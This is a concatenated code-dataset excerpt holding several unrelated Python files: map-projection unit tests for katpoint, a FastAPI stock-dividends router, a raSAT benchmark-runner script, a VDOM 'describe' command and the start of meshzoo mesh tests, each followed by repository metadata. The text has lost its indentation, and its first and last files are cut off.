xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi, 0.0))
np.testing.assert_almost_equal(xy, [0.0, np.pi / 2.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [np.pi / 2.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, -np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [-np.pi / 2.0, 0.0], decimal=12)
# Point diametrically opposite the reference point on sphere
xy = np.array(self.sphere_to_plane(np.pi, 0.0, 0.0, 0.0))
np.testing.assert_almost_equal(np.abs(xy), [np.pi, 0.0], decimal=12)
# Points outside allowed domain on sphere
self.assertRaises(ValueError, self.sphere_to_plane, 0.0, 0.0, 0.0, np.pi)
# PLANE TO SPHERE
# Origin
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 0.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
# Points on unit circle in plane
ae = np.array(self.plane_to_sphere(0.0, 0.0, 1.0, 0.0))
assert_angles_almost_equal(ae, [1.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, -1.0, 0.0))
assert_angles_almost_equal(ae, [-1.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 1.0))
assert_angles_almost_equal(ae, [0.0, 1.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, -1.0))
assert_angles_almost_equal(ae, [0.0, -1.0], decimal=12)
# Points on circle with radius pi in plane
ae = np.array(self.plane_to_sphere(0.0, 0.0, np.pi, 0.0))
assert_angles_almost_equal(ae, [np.pi, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, -np.pi, 0.0))
assert_angles_almost_equal(ae, [-np.pi, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, np.pi))
assert_angles_almost_equal(ae, [np.pi, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, -np.pi))
assert_angles_almost_equal(ae, [np.pi, 0.0], decimal=12)
# Reference point at pole on sphere
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, np.pi / 2.0, 0.0))
assert_angles_almost_equal(ae, [np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, -np.pi / 2.0, 0.0))
assert_angles_almost_equal(ae, [-np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 0.0, np.pi / 2.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 0.0, -np.pi / 2.0))
assert_angles_almost_equal(ae, [np.pi, 0.0], decimal=12)
# Points outside allowed domain in plane
self.assertRaises(ValueError, self.plane_to_sphere, 0.0, 0.0, 4.0, 0.0)
self.assertRaises(ValueError, self.plane_to_sphere, 0.0, 0.0, 0.0, 4.0)
class TestProjectionSTG(unittest.TestCase):
"""Test stereographic projection."""
def setUp(self):
self.plane_to_sphere = katpoint.plane_to_sphere['STG']
self.sphere_to_plane = katpoint.sphere_to_plane['STG']
N = 100
# Stay well away from point of projection
max_theta = 0.8 * np.pi
self.az0 = np.pi * (2.0 * np.random.rand(N) - 1.0)
# Keep away from poles (leave them as corner cases)
self.el0 = 0.999 * np.pi * (np.random.rand(N) - 0.5)
# Perform inverse STG mapping to spread out points on plane
theta = max_theta * np.random.rand(N)
r = 2.0 * np.sin(theta) / (1.0 + np.cos(theta))
phi = 2 * np.pi * np.random.rand(N)
self.x = r * np.cos(phi)
self.y = r * np.sin(phi)
def test_random_closure(self):
"""STG projection: do random projections and check closure."""
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
xx, yy = self.sphere_to_plane(self.az0, self.el0, az, el)
aa, ee = self.plane_to_sphere(self.az0, self.el0, xx, yy)
np.testing.assert_almost_equal(self.x, xx, decimal=9)
np.testing.assert_almost_equal(self.y, yy, decimal=9)
assert_angles_almost_equal(az, aa, decimal=9)
assert_angles_almost_equal(el, ee, decimal=9)
def test_aips_compatibility(self):
"""STG projection: compare with original AIPS routine."""
if not found_aips:
skip("AIPS projection module not found")
return
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
xx, yy = self.sphere_to_plane(self.az0, self.el0, az, el)
az_aips, el_aips = np.zeros(az.shape), np.zeros(el.shape)
x_aips, y_aips = np.zeros(xx.shape), np.zeros(yy.shape)
for n in xrange(len(az)):
az_aips[n], el_aips[n], ierr = \
newpos(6, self.az0[n], self.el0[n], self.x[n], self.y[n])
x_aips[n], y_aips[n], ierr = \
dircos(6, self.az0[n], self.el0[n], az[n], el[n])
self.assertEqual(ierr, 0)
# AIPS NEWPOS STG has poor accuracy on azimuth angle (large closure errors by itself)
# assert_angles_almost_equal(az, az_aips, decimal=9)
assert_angles_almost_equal(el, el_aips, decimal=9)
np.testing.assert_almost_equal(xx, x_aips, decimal=9)
np.testing.assert_almost_equal(yy, y_aips, decimal=9)
def test_corner_cases(self):
"""STG projection: test special corner cases."""
# SPHERE TO PLANE
# Origin
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, 0.0], decimal=12)
# Points 90 degrees from reference point on sphere
xy = np.array(self.sphere_to_plane(0.0, 0.0, np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [2.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, -np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [-2.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, np.pi / 2.0))
np.testing.assert_almost_equal(xy, [0.0, 2.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, -np.pi / 2.0))
np.testing.assert_almost_equal(xy, [0.0, -2.0], decimal=12)
# Reference point at pole on sphere
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, 0.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, -2.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi, 0.0))
np.testing.assert_almost_equal(xy, [0.0, 2.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [2.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, -np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [-2.0, 0.0], decimal=12)
# Points outside allowed domain on sphere
self.assertRaises(ValueError, self.sphere_to_plane, 0.0, 0.0, np.pi, 0.0)
self.assertRaises(ValueError, self.sphere_to_plane, 0.0, 0.0, 0.0, np.pi)
# PLANE TO SPHERE
# Origin
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 0.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
# Points on circle of radius 2.0 in plane
ae = np.array(self.plane_to_sphere(0.0, 0.0, 2.0, 0.0))
assert_angles_almost_equal(ae, [np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, -2.0, 0.0))
assert_angles_almost_equal(ae, [-np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 2.0))
assert_angles_almost_equal(ae, [0.0, np.pi / 2.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, -2.0))
assert_angles_almost_equal(ae, [0.0, -np.pi / 2.0], decimal=12)
# Reference point at pole on sphere
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 2.0, 0.0))
assert_angles_almost_equal(ae, [np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, -2.0, 0.0))
assert_angles_almost_equal(ae, [-np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 0.0, 2.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 0.0, -2.0))
assert_angles_almost_equal(ae, [np.pi, 0.0], decimal=12)
class TestProjectionCAR(unittest.TestCase):
"""Test plate carree projection."""
def setUp(self):
self.plane_to_sphere = katpoint.plane_to_sphere['CAR']
self.sphere_to_plane = katpoint.sphere_to_plane['CAR']
N = 100
# Unrestricted (az0, el0) points on sphere
self.az0 = np.pi * (2.0 * np.random.rand(N) - 1.0)
self.el0 = np.pi * (np.random.rand(N) - 0.5)
# Unrestricted (x, y) points on corresponding plane
self.x = np.pi * (2.0 * np.random.rand(N) - 1.0)
self.y = np.pi * (np.random.rand(N) - 0.5)
def test_random_closure(self):
"""CAR projection: do random projections and check closure."""
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
xx, yy = self.sphere_to_plane(self.az0, self.el0, az, el)
aa, ee = self.plane_to_sphere(self.az0, self.el0, xx, yy)
np.testing.assert_almost_equal(self.x, xx, decimal=12)
np.testing.assert_almost_equal(self.y, yy, decimal=12)
assert_angles_almost_equal(az, aa, decimal=12)
assert_angles_almost_equal(el, ee, decimal=12)
def sphere_to_plane_mattieu(targetaz,targetel,scanaz,scanel):
#produces direction cosine coordinates from scanning antenna azimuth,elevation coordinates
#see _coordinate options.py for derivation
ll=np.cos(targetel)*np.sin(targetaz-scanaz)
mm=np.cos(targetel)*np.sin(scanel)*np.cos(targetaz-scanaz)-np.cos(scanel)*np.sin(targetel)
return ll,mm
def plane_to_sphere_mattieu(targetaz,targetel,ll,mm):
scanaz=targetaz-np.arcsin(np.clip(ll/np.cos(targetel),-1.0,1.0))
scanel=np.arcsin(np.clip((np.sqrt(1.0-ll**2-mm**2)*np.sin(targetel)+np.sqrt(np.cos(targetel)**2-ll**2)*mm)/(1.0-ll**2),-1.0,1.0))
#alternate equations which gives same result
# scanel_alternate1=np.arcsin((np.sqrt(1.0-ll**2-mm**2)*np.sin(targetel)+np.cos(targetel)*np.cos(targetaz-scanaz)*mm)/(1.0-ll**2))
# num=np.cos(targetel)*np.cos(targetaz-scanaz)#or num=np.sqrt(np.cos(targetel)**2-ll**2)
# den=np.sin(targetel)**2+num**2
# scanel_alternate2=np.arcsin((np.sqrt(((den-mm**2)*(den-num**2)))+num*mm)/den)
return scanaz,scanel
class TestProjectionSSN(unittest.TestCase):
"""Test swapped orthographic projection."""
def setUp(self):
self.plane_to_sphere = katpoint.plane_to_sphere['SSN']
self.sphere_to_plane = katpoint.sphere_to_plane['SSN']
N = 100
self.az0 = np.pi * (2.0 * np.random.rand(N) - 1.0)
# Keep away from poles (leave them as corner cases)
self.el0 = 0.999 * np.pi * (np.random.rand(N) - 0.5)
# (x, y) points within complicated SSN domain - clipped unit circle
cos_el0 = np.cos(self.el0)
# The x coordinate is bounded by +- cos(el0)
self.x = (2 * np.random.rand(N) - 1) * cos_el0
# The y coordinate ranges between two (semi-)circles centred on origin:
# the unit circle on one side and circle of radius cos(el0) on other side
y_offset = -np.sqrt(cos_el0 ** 2 - self.x ** 2)
y_range = -y_offset + np.sqrt(1.0 - self.x ** 2)
self.y = (y_range * np.random.rand(N) + y_offset) * np.sign(self.el0)
def test_random_closure(self):
"""SSN projection: do random projections and check closure."""
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
xx, yy = self.sphere_to_plane(self.az0, self.el0, az, el)
aa, ee = self.plane_to_sphere(self.az0, self.el0, xx, yy)
np.testing.assert_almost_equal(self.x, xx, decimal=10)
np.testing.assert_almost_equal(self.y, yy, decimal=10)
assert_angles_almost_equal(az, aa, decimal=10)
assert_angles_almost_equal(el, ee, decimal=10)
def test_vs_mattieu(self):
"""SSN projection: compare against Mattieu's original version."""
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
ll, mm = sphere_to_plane_mattieu(self.az0, self.el0, az, el)
aa, ee = plane_to_sphere_mattieu(self.az0, self.el0, ll, mm)
np.testing.assert_almost_equal(self.x, ll, decimal=10)
np.testing.assert_almost_equal(self.y, -mm, decimal=10)
assert_angles_almost_equal(az, aa, decimal=10)
assert_angles_almost_equal(el, ee, decimal=10)
def test_corner_cases(self):
"""SSN projection: test special corner cases."""
# SPHERE TO PLANE
# Origin
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, 0.0], decimal=12)
# Points 90 degrees from reference point on sphere
xy = np.array(self.sphere_to_plane(0.0, 0.0, np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [-1.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, -np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [1.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, np.pi / 2.0))
np.testing.assert_almost_equal(xy, [0.0, -1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, -np.pi / 2.0))
np.testing.assert_almost_equal(xy, [0.0, 1.0], decimal=12)
# Reference point at pole on sphere
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, 0.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, 1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi, 1e-8))
np.testing.assert_almost_equal(xy, [0.0, 1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, 1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, -np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, 1.0], decimal=12)
# Points outside allowed domain on sphere
self.assertRaises(ValueError, self.sphere_to_plane, 0.0, 0.0, np.pi, 0.0)
self.assertRaises(ValueError, self.sphere_to_plane, 0.0, 0.0, 0.0, np.pi)
# PLANE TO SPHERE
# Origin
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 0.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
# Points on unit circle in plane
ae = np.array(self.plane_to_sphere(0.0, 0.0, 1.0, 0.0))
assert_angles_almost_equal(ae, [-np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, -1.0, 0.0))
assert_angles_almost_equal(ae, [np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 1.0))
assert_angles_almost_equal(ae, [0.0, -np.pi / 2.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, -1.0))
assert_angles_almost_equal(ae, [0.0, np.pi / 2.0], decimal=12)
# Reference point at pole on sphere
ae = np.array(self.plane_to_sphere(0.0, np.pi / 2.0, 0.0, 1.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 0.0, -1.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
# Test valid (x, y) domain
ae = np.array(self.plane_to_sphere(0.0, 1.0, 0.0, -np.cos(1.0)))
assert_angles_almost_equal(ae, [0.0, np.pi / 2.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -1.0, 0.0, np.cos(1.0)))
assert_angles_almost_equal(ae, [0.0, -np.pi / 2.0], decimal=12)
# Points outside allowed domain in plane
self.assertRaises(ValueError, self.plane_to_sphere, 0.0, 0.0, 2.0, 0.0)
self.assertRaises(ValueError, self.plane_to_sphere, 0.0, 0.0, 0.0, 2.0)
| [
"[email protected]"
] | |
e71f2ad4ff01abe55a1af73d50b4b2075d281736 | b2f3b7b3be11a63d5d1ddfea945439402394efe7 | /routers/stock_dividends.py | 867f17a070eb93246f322a74b193cce05c8808cc | [] | no_license | leonardoo/fast_api_stock_bvc | a8a57b9e2e3822c84829a91702ba2ce73c6ff439 | c91b9267360ed0aacd2e98a1da9b1e3b160dc837 | refs/heads/main | 2023-08-13T08:05:41.064300 | 2021-10-08T00:05:14 | 2021-10-08T00:05:14 | 383,130,473 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,012 | py | from typing import List
from datetime import datetime
from fastapi import APIRouter, Depends
from starlette.responses import JSONResponse
from models.stock import Stock
from models.stock_dividends import StockDividends
from models.users import User
from plugins.fastapi_users import fastapi_users
router = APIRouter(
prefix="/dividends",
tags=["dividends"],
)
def get_current_year():
return datetime.now().year
@router.post("/", response_model=StockDividends)
async def create_dividend(dividend: StockDividends, user: User = Depends(fastapi_users.current_user(verified=True))):
stock = await Stock.objects.get_or_none(nemo=dividend.nemo)
if not stock:
return JSONResponse(status_code=404, content={"message": "Stock not found"})
dividend_data = dividend.dict(exclude_unset=True)
total = dividend_data.pop("total")
paid_amount = dividend_data.pop("paid_amount")
dividend_data.pop("nemo")
dividend_data["ex_dividend_date"] = str(dividend_data["ex_dividend_date"])
dividend_data["paid_at"] = str(dividend_data["paid_at"])
dividend_data["stock_id"] = stock.id
dividend_obj = await StockDividends.objects.get_or_create(**dividend_data)
dividend_obj.total = total
dividend_obj.paid_amount = paid_amount
await dividend_obj.update()
return dividend_obj
@router.get("/", response_model=List[StockDividends])
async def get_list_dividends():
year = get_current_year()
data = StockDividends.objects.filter(paid_at__gte=f"{year}-01-01", paid_at__lt=f"{year+1}-01-01")
data = data.select_related("stock_id")
data = data.order_by("paid_at")
return await data.all()
@router.get("/{nemo}", response_model=List[StockDividends])
async def get_stock(nemo: str):
stock = await Stock.objects.get_or_none(nemo=nemo)
if not stock:
return JSONResponse(status_code=404, content={"message": "Stock not found"})
data = StockDividends.objects
data = data.filter(stock_id=stock.id)
return await data.all()
| [
"[email protected]"
] | |
30afc63d7c5839fede97f2925e6bbb6f93e81b28 | e65453aecb1b64f75a4a6eee7ca1328984773d5d | /Test/test1.py | 662d8a12291d456ee624881943ae9a53dc213b46 | [] | no_license | huyendtt58/raSAT | 1a9a0a1c05b81877416e82c9c102ae92c6d80931 | b4f7c8995eef71bd099046c761ea19ea904fd18d | refs/heads/master | 2021-01-19T14:27:24.036231 | 2017-02-23T12:36:52 | 2017-02-23T12:36:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,520 | py | import fnmatch
import os
import subprocess
import csv
matches = []
def run(directory, initLowerBound, initUpperBound, initSbox, timeout, resultFile):
lowerBound = initLowerBound
upperBound = initUpperBound
#sbox = initSbox
solvedProblems = 0
with open(os.path.join(directory, resultFile), 'wb') as csvfile:
spamwriter = csv.writer(csvfile)
spamwriter.writerow(['Problem', 'nVars', 'maxVars', 'nAPIs', 'time', 'iaTime', 'testingTime', 'usCoreTime', 'parsingTime', 'decompositionTime', 'miniSATTime', 'miniSATVars', 'miniSATClauses', 'miniSATCalls', 'raSATClauses', 'decomposedLearnedClauses', 'UNSATLearnedClauses', 'unknownLearnedClauses', 'result', 'raSATResult', 'EQ', 'NEQ'])
csvfile.close()
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, '*.smt2'):
print "Checking ", filename
sbox = initSbox * 10
nVars = 0
maxVars = 0
nAPIs = 0
iaTime = 0
testingTime=0
usTime=0
parsingTime=0
decompositionTime=0
miniSATTime=0
miniSATVars = 0;
time=0
miniSATCalls=0
miniSATClauses = 0
raSATClauses=0
decomposedLearnedClauses=0
UNSATLearnedClauses=0
unknownLearnedClauses=0
result='unknown'
raSATResult = 'unknown'
isEquation = '0'
isNotEquation = '0'
try:
f = open(os.path.join(root, filename))
for line in f:
if line.startswith('(set-info :status'):
result = line[18:len(line)-2]
f.close()
except IOError:
result = 'unknown'
bounds = ['lb=-1 1', 'lb=-10 10', 'lb=-inf inf']
boundsNum = len(bounds)
boundIndex = 0
while (raSATResult != 'sat' and time < timeout and boundIndex < boundsNum):
if raSATResult == 'unknown':
sbox = sbox / 10
subprocess.call(["./raSAT", os.path.join(root, filename), bounds[boundIndex], 'sbox=' + str(sbox), 'tout=' + str(timeout-time)])
try:
with open(os.path.join(root, filename) + '.tmp', 'rb') as csvfile:
reader = csv.reader(csvfile)
output = reader.next()
nVars = output[1]
maxVars = output[2]
nAPIs = output[3]
time += float(output[4])
iaTime += float(output[5])
testingTime += float(output[6])
usTime += float(output[7])
parsingTime += float(output[8])
decompositionTime += float(output[9])
miniSATTime += float(output[10])
miniSATVars += float(output[11])
miniSATClauses += float(output[12])
miniSATCalls += float(output[13])
raSATClauses += float(output[14])
decomposedLearnedClauses += float(output[15])
UNSATLearnedClauses += float(output[16])
unknownLearnedClauses += float(output[17])
isEquation = output[18]
isNotEquation = output[19]
raSATResult = output[20]
csvfile.close()
except IOError:
raSATResult = 'timeout'
if raSATResult == 'unsat':
boundIndex += 1
if raSATResult == 'sat' or raSATResult == 'unsat':
solvedProblems += 1
with open(os.path.join(directory, resultFile), 'a') as csvfile:
spamwriter = csv.writer(csvfile)
spamwriter.writerow([os.path.join(root, filename), nVars, maxVars, nAPIs, time, iaTime, testingTime, usTime, parsingTime, decompositionTime, miniSATTime, miniSATVars, miniSATClauses, miniSATCalls, raSATClauses, decomposedLearnedClauses, UNSATLearnedClauses, unknownLearnedClauses, result, raSATResult, isEquation, isNotEquation])
csvfile.close()
try:
os.remove(os.path.join(root, filename) + '.tmp')
except OSError:
pass
try:
os.remove(os.path.join(root, filename)[:-5] + '.in')
except OSError:
pass
try:
os.remove(os.path.join(root, filename)[:-5] + '.out')
except OSError:
pass
try:
os.remove(os.path.join(root, filename)[:-5] + '.rs')
except OSError:
pass
with open(os.path.join(directory, resultFile), 'a') as csvfile:
spamwriter = csv.writer(csvfile)
spamwriter.writerow(['Problem', 'nVars', 'maxVars', 'nAPIs', 'time', 'iaTime', 'testingTime', 'usCoreTime', 'parsingTime', 'decompositionTime', 'miniSATTime', 'miniSATVars', 'miniSATClauses', 'miniSATCalls', 'raSATClauses', 'decomposedLearnedClauses', 'UNSATLearnedClauses', 'unknownLearnedClauses', 'result', solvedProblems, 'EQ', 'NEQ'])
csvfile.close()
#run ('zankl', -10, 10, 0.1, 500, 'with_dependency_sensitivity_restartSmallerBox_boxSelectionUsingSensitivity.xls')
#run ('QF_NRA/meti-tarski', -10, 10, 0.1, 500, 'with_dependency_sensitivity_restartSmallerBox_boxSelectionUsingSensitivity.xls')
#run ('Test/meti-tarski', -1, 1, 0.1, 60, 'result.xls')
#run ('Test/zankl', -10, 10, 0.1, 30, 'result.xls')
#run ('Test/smtlib-20140121/QF_NIA/AProVE', -10, 10, 0.1, 60, 'result.xls')
#run ('Test/smtlib-20140121/QF_NIA/calypto', -10, 10, 0.1, 60, 'result.xls')
#run ('Test/smtlib-20140121/QF_NIA/leipzig', -10, 10, 0.1, 60, 'result.xls')
#run ('Test/smtlib-20140121/QF_NIA/mcm', -10, 10, 0.1, 60, 'result.xls')
#run ('Test/smtlib-20140121/QF_NRA/hycomp', -10, 10, 0.1, 60, '1-5-8.csv')
run ('Test/smtlib-20140121/QF_NRA/meti-tarski', -10, 10, 0.1, 60, '1-5-8-11.csv')
#run ('Test/test', -10, 10, 0.1, 60, 'result.csv')
| [
"[email protected]"
] | |
95292dbab6b727fc93cbd5ed860178fecee84ca4 | 752116ef4b69a3049fef0cfe9b3d212548cc81b1 | /sources/actions/watch/describe.py | ef16f46eb7e4fe787faa620233f6f13455fd54fb | [] | no_license | VDOMBoxGroup/runtime2.0 | e54af4af7a642f34b0e07b5d4096320494fb9ae8 | cb9932f5f75d5c6d7889f26d58aee079b4127299 | refs/heads/develop | 2023-07-07T11:06:10.817093 | 2023-07-03T06:11:55 | 2023-07-03T06:11:55 | 62,622,255 | 0 | 12 | null | 2023-05-23T02:55:00 | 2016-07-05T09:09:48 | Python | UTF-8 | Python | false | false | 4,418 | py |
from logs import console
from utils.structure import Structure
from utils.parsing import VALUE, Parser, ParsingException
from ..auxiliary import section, show
from .auxiliary import query
REQUEST = "<action name=\"describe\">%s</action>"
SOURCE_OBJECTS_OPTION = "<option name=\"source\">objects</option>"
SOURCE_GARBAGE_OPTION = "<option name=\"source\">garbage</option>"
SOURCE_CHANGES_OPTION = "<option name=\"source\">changes</option>"
FILTER_BY_SERVER_OPTION = "<option name=\"filter\">server</option>"
SORT_BY_NAME = "SORT BY NAME"
SORT_BY_COUNTER = "SORT BY COUNTYER"
SORT_VALUES = {
"n": SORT_BY_NAME,
"name": SORT_BY_NAME,
"c": SORT_BY_COUNTER,
"counter": SORT_BY_COUNTER
}
ORDER_BY_ASCENDING = "ORDER BY ASCENDING"
ORDER_BY_DESCENDING = "ORDER BY DESCENDING"
ORDER_VALUES = {
"a": ORDER_BY_ASCENDING,
"asc": ORDER_BY_ASCENDING,
"ascending": ORDER_BY_ASCENDING,
"d": ORDER_BY_DESCENDING,
"desc": ORDER_BY_DESCENDING,
"descending": ORDER_BY_DESCENDING
}
def sort_by_name(x):
return x[0]
def sort_by_counter(x):
return x[1], -x[2], x[0]
def builder(parser):
# <reply>
def reply():
result = Structure(entries=None)
# <descriptions>
def descriptions():
result.entries = []
# <subgroup>
def subgroup(name):
subgroup = []
result.entries.append((name, subgroup))
# <description>
def description(object):
value = yield VALUE
subgroup.append((object, value))
# </description>
return description
# </subgroup>
return subgroup
# </descriptions>
yield descriptions
parser.accept(result)
# </reply>
return reply
def run(address=None, port=None, timeout=None,
all=False, sort=None, order=None, limit=None,
objects=False, garbage=False, changes=False):
"""
describe server object changes
:param address: specifies server address
:key int port: specifies server port
:key float timeout: specifies timeout to wait for reply
:key switch all: disable objects filtering
:key sort: sort entries by "name" or by "counter"
:key order: sort entries "asc"ending or "desc"ending
:key int limit: limit output
:key switch objects: use all objects
:key switch garbage: use objects from garbage
:key switch changes: use changes
"""
try:
if sum((objects, garbage, changes)) > 1:
raise Exception("Options \"objects\", \"garbage\" and \"changes\" are mutually exclusive")
sort = SORT_VALUES.get((sort or "").lower(), SORT_BY_NAME)
if sort is SORT_BY_COUNTER and order is None:
order = "desc"
order = ORDER_VALUES.get((order or "").lower(), ORDER_BY_ASCENDING)
options = "".join(filter(None, (
SOURCE_OBJECTS_OPTION if objects else None,
SOURCE_GARBAGE_OPTION if garbage else None,
SOURCE_CHANGES_OPTION if changes else None,
None if all else FILTER_BY_SERVER_OPTION,)))
request = REQUEST % options
message = query("describe objects", address, port, request, timeout=timeout)
parser = Parser(builder=builder, notify=True, supress=True)
result = parser.parse(message)
if not result:
raise Exception("Incorrect response")
except ParsingException as error:
console.error("unable to parse, line %s: %s" % (error.lineno, error))
except Exception as error:
console.error(error)
else:
console.write()
with section("objects"):
if result.entries:
key = sort_by_counter if sort is SORT_BY_COUNTER else sort_by_name
reverse = order is ORDER_BY_DESCENDING
entries = sorted(result.entries, key=key, reverse=reverse)
if limit is not None:
entries = entries[:limit]
for name, subgroup in entries:
with section(name):
for object, description in subgroup:
with section(object, lazy=False):
for part in description.split(" < "):
show(part, longer=True)
else:
show("no objects")
| [
"[email protected]"
] | |
87cee6b3fc7d259b87a0cb05ee0fee88ed14e10f | 9ae2d337cbfa56768580187cc507f9c3c4ace1a8 | /test/test_meshzoo.py | abc4f1e9a37a6ea0c9ac22e5aea80e860fa44c3f | [
"MIT"
] | permissive | tongluocq/meshzoo | 5a734012e02f70bdf37147a3520b733f5095da02 | 46d3a999b7537fdcea92cd19ae53920b8639b0b3 | refs/heads/master | 2020-09-26T11:21:16.086387 | 2019-10-16T16:36:25 | 2019-10-16T16:36:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,706 | py | import numpy
import pytest
import meshzoo
from helpers import _near_equal
def test_cube():
points, cells = meshzoo.cube()
assert len(points) == 1331
assert len(cells) == 5000
points, cells = meshzoo.cube(nx=3, ny=3, nz=3)
assert len(points) == 27
assert all(numpy.sum(points, axis=0) == [13.5, 13.5, 13.5])
assert len(cells) == 40
def test_hexagon():
points, cells = meshzoo.hexagon(2)
assert len(points) == 61
assert _near_equal(numpy.sum(points, axis=0), [0.0, 0.0, 0.0])
assert len(cells) == 96
@pytest.mark.parametrize(
"num_twists, num_points, num_cells, ref1, ref2",
[
[1, 5890, 11400, [0, 0, 0], [2753575 / 9.0, 2724125 / 9.0, 58900 / 3.0]],
[2, 5890, 11400, [0, 0, 0], [2797750 / 9.0, 2679950 / 9.0, 58900 / 3.0]],
],
)
def test_moebius(num_twists, num_points, num_cells, ref1, ref2):
points, cells = meshzoo.moebius(num_twists, 190, 31, mode="smooth")
assert len(points) == num_points
assert len(cells) == num_cells
assert _near_equal(numpy.sum(points, axis=0), ref1, tol=1.0e-10)
sum_points2 = numpy.sum(points ** 2, axis=0)
assert numpy.allclose(sum_points2, ref2, rtol=1.0e-12, atol=0.0)
@pytest.mark.parametrize(
"num_twists, num_points, num_cells, ref1, ref2",
[
[
1,
5700,
11020,
[0, 0, 0],
[[296107.21982759, 292933.72844828, 19040.94827586]],
],
[
2,
5700,
11020,
[0, 0, 0],
[[300867.45689655, 288173.49137931, 19040.94827586]],
],
],
)
def test_moebius2(num_twists, num_points, num_cells, ref1, ref2):
points, cells = meshzoo.moebius(nl=190, nw=30, num_twists=num_twists, mode="smooth")
assert len(points) == num_points
assert len(cells) == num_cells
assert _near_equal(numpy.sum(points, axis=0), ref1, tol=1.0e-10)
sum_points2 = numpy.sum(points ** 2, axis=0)
assert numpy.allclose(sum_points2, ref2, rtol=1.0e-12, atol=0.0)
@pytest.mark.parametrize(
"num_twists, num_points, num_cells, ref1, ref2",
[
